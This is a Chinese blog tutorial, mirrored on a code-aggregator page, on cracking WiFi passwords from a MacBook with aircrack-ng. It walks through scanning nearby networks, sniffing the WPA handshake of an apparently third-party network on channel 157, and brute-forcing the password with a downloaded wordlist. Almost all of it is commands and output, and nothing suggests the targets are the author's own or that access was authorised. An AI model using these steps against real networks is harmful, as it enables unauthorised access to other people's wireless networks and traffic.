相关文章推荐
星星上的斑马  ·  flex Vector - ...·  4 天前    · 
星星上的斑马  ·  javascript动态添加、修改、删除对象 ...·  7 月前    · 
星星上的斑马  ·  python3csv与xlsx文件操作模块( ...·  10 月前    · 
星星上的斑马  ·  python - pipenv ...·  10 月前    · 
星星上的斑马  ·  Mysql一对多&多对多关联查询 - 墨天轮·  10 月前    · 
星星上的斑马  ·  s-tui:在Linux中监控CPU温度、频 ...·  10 月前    · 
星星上的斑马  ·  org.jboss.seam.Entity ...·  11 月前    · 
星星上的斑马  ·  spring - Caused by: ...·  11 月前    · 
星星上的斑马  ·  Spring源码构建导入IDEA常见问题及解 ...·  11 月前    · 
星星上的斑马  ·  Django ...·  11 月前    · 
失恋的回锅肉  ·  MWC2024直击丨荣耀猛攻AI ...·  1小时前    · 
闯红灯的八宝粥  ·  上海市长宁区人民政府-长宁区北新泾街道-社区 ...·  1小时前    · 
霸气的沙滩裤  ·  EXCEL图文教程:VBA条件语句入门级教程 ...·  1小时前    · 
谦逊的灌汤包  ·  excel中大部分的VBA脚本都可以靠写函数 ...·  1小时前    · 
难过的打火机  ·  使用 If...Then...Else ...·  1小时前    · 
聪明的手电筒  ·  【常用方法】真实盈余管理REM计算Stata ...·  1小时前    · 
朝气蓬勃的火腿肠  ·  基于Jones修正模型的盈余管理测度2001 ...·  1小时前    · 
儒雅的打火机  ·  交易所一线监管能甄别资本市场风险吗?·  1小时前    · 
不拘小节的吐司  ·  【SQL】根据表中数据,以年月时间排序_sq ...·  1小时前    · 
温文尔雅的生姜  ·  mssql sqlserver ...·  1小时前    · 
Code  ›  MACBOOK 破解wifi密码 - halberd.lee
sudo 博客园 aes
https://www.cnblogs.com/halberd-lee/p/11400347.html
星星上的斑马
1 年前

安装时可能会遇到相关路径操作权限不足的问题,根据提示,直接复制命令执行,例如: 

sudo chown -R $(whoami) /usr/local/lib /usr/local/lib/pkgconfig /usr/local/lib/python3.7/site-packages
chmod u+w /usr/local/lib /usr/local/lib/pkgconfig /usr/local/lib/python3.7/site-packages

安装完成后,在使用时需要指定绝对路径来调用 aircrack-ng ,此时为了方便,做以下操作:


# 创建路径
halberd:bin halberd$ sudo mkdir -p /usr/local/sbin
# 修改路径的属组
halberd:bin halberd$ sudo chown -R halberd:admin /usr/local/sbin
# 建立文件连接
halberd:bin halberd$ brew link aircrack-ng
Linking /usr/local/Cellar/aircrack-ng/1.5.2... 54 symlinks created

后面就可以直接调用 aircrack-ng及相关命令了。


3 获取wifi网卡信息


左键单南wifi图标:


 在下拉框中选择 "Open Network Preference":


 随后点迁wifi后,点选右侧框的"Advanced":


 接下来在新的窗口中选择hardware 查看MAC地址:


找到mac地址后, 查看网卡设备名:


ifconfig |grep -i "98:5a:eb:8b:e1:9e" -A 4 -B 1

结果如下:


  halberd:tmp halberd$ ifconfig |grep -i "98:5a:eb:8b:e1:9e" -A 4 -B 1
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	ether 98:5a:eb:8b:e1:9e
	nd6 options=201<PERFORMNUD,DAD>
	media: autoselect (<unknown type>)
	status: inactive
en1: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500

由此确定wifi网卡的设备名是en0.


4 获取所有可识别的wifi信息


halberd:tmp halberd$ sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s
Password:
                            SSID BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
                        3号直播间 dc:16:b2:5b:c9:9c -84  157     Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
            AIHZ WaveLAN Network 54:a2:74:2d:8a:5f -79  149     Y  CN WPA2(PSK/AES/AES)
                       klbblm-sj 48:7d:2e:5e:76:7d -75  149     Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
                   ChinaNet-QpNr 18:75:32:ad:25:d1 -58  9       Y  -- WPA(PSK/AES,TKIP/TKIP)
                        PublicRD 08:57:00:67:3a:c0 -67  6,+1    Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
                      PublicRD03 34:96:72:a4:e1:ff -42  6,-1    Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
                  Leave-me-alone 3c:46:d8:69:c9:9d -31  6,-1    Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
            AIHZ WaveLAN Network 54:a2:74:2d:8a:50 -53  1       Y  CN WPA2(PSK/AES/AES)
                     celled_yang dc:fe:18:c6:62:fd -60  1,+1    Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
                       klbblm-dn 48:7d:2e:5e:76:7b -58  11,-1   Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
                             zzz 70:af:6a:00:63:c6 -75  11,-1   Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
                        2号直播间 48:7d:2e:51:ea:9c -68  11      Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)

其中特别注意的是channel ,后面的步骤需要用到。这里我将破解3号直接间的wifi密码, 对应的channel 是157。


5 监听wifi登录信息


sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 157

当执行以上命令, 开始监听以后, wifi的图标会发生改变, 变成一个小眼睛一样的图标: 


在监听过程中,假如有人登录了该wifi, airport会将监听到的包信息获取到本地,并保存在/tmp路径中。 文件命名格式为: airportSniffxxxx.cap ,在监听过程中可随时查看/tmp最新生成的文件 大小。可以多监听一断时间,只要有人登录, 密码信息就会被保存起来。


当获取了信息后,可以使用 Ctrl-c 取消监听。


在测试过程中,出现了 Segmentation fault: 11 错误,有可能是空指针问题。待解决。


6 查看是否获取handshake信息


sudo aircrack-ng   /tmp/airportSniff8g0Oex.cap

如果没有,则继续执行上一步操作,继续监听。


7 获取密码字典


可以去github上搜索密码字典,比如搜索 "爆破"。 也可以直接从https://github.com/rootphantomer/Blasting_dictionary 中下载,进行尝试。


8 破解


sudo aircrack-ng -w <密码文件> -b <BSSID>  <监听信息文件>

破解完成后, 程序会输出 "KEY FOUND! [xxxxxx]" [] 里的就是密码。


如果没破解出来,可以换个字典继续尝试破解。
 
推荐文章
星星上的斑马  ·  flex Vector - CanntBelieve
4 天前
星星上的斑马  ·  javascript动态添加、修改、删除对象的属性和方法__js给对象动态添加属性
7 月前
星星上的斑马  ·  python3csv与xlsx文件操作模块(csv、xlsxwriter) - Py.qi
10 月前
星星上的斑马  ·  python - pipenv install 报错 -
10 月前
星星上的斑马  ·  Mysql一对多&多对多关联查询 - 墨天轮
10 月前
星星上的斑马  ·  s-tui:在Linux中监控CPU温度、频率、功率和使用率的终端工具
10 月前
星星上的斑马  ·  org.jboss.seam.Entity java code examples | Tabnine
11 月前
星星上的斑马  ·  spring - Caused by: java.lang.IllegalArgumentException: Could not resolve placeholder 'some.other.pr
11 月前
星星上的斑马  ·  Spring源码构建导入IDEA常见问题及解决方案
11 月前
星星上的斑马  ·  Django 中的数组字段_django_Postgredaxiang-PostgreSQL
11 月前
失恋的回锅肉  ·  MWC2024直击丨荣耀猛攻AI 高端市场挑战苹果三星 - 21经济网
1小时前
闯红灯的八宝粥  ·  上海市长宁区人民政府-长宁区北新泾街道-社区新闻-集结令:科技之光闪耀苏河,AI童谣获奖家庭邀你共赴五月科技节!
1小时前
霸气的沙滩裤  ·  EXCEL图文教程:VBA条件语句入门级教程|vba|msgbox_网易订阅
1小时前
谦逊的灌汤包  ·  excel中大部分的VBA脚本都可以靠写函数来解决得到相同的结果,那么VBA的好处是什么呢? - Microsoft Community
1小时前
难过的打火机  ·  使用 If...Then...Else 陳述式 (VBA) | Microsoft Learn
1小时前
聪明的手电筒  ·  【常用方法】真实盈余管理REM计算Stata代码(附2000-2022年原始数据和结果)_真实盈余管理计算
1小时前
朝气蓬勃的火腿肠  ·  基于Jones修正模型的盈余管理测度2001-2021年(数据+stata代码)_企业_al_Aboody
1小时前
儒雅的打火机  ·  交易所一线监管能甄别资本市场风险吗?
1小时前
不拘小节的吐司  ·  【SQL】根据表中数据,以年月时间排序_sql按日期排序
1小时前
温文尔雅的生姜  ·  mssql sqlserver 分组排序函数row_number、rank、dense_rank用法简介及说明 - liyongke
1小时前
今天看啥   ·   Py中国   ·   codingpro   ·   藏经阁   ·   小百科   ·   link之家   ·   卧龙AI搜索
Code - 代码工具平台
删除内容请联系邮箱 2879853325@qq.com
© 2024 ~ 沪ICP备11025650号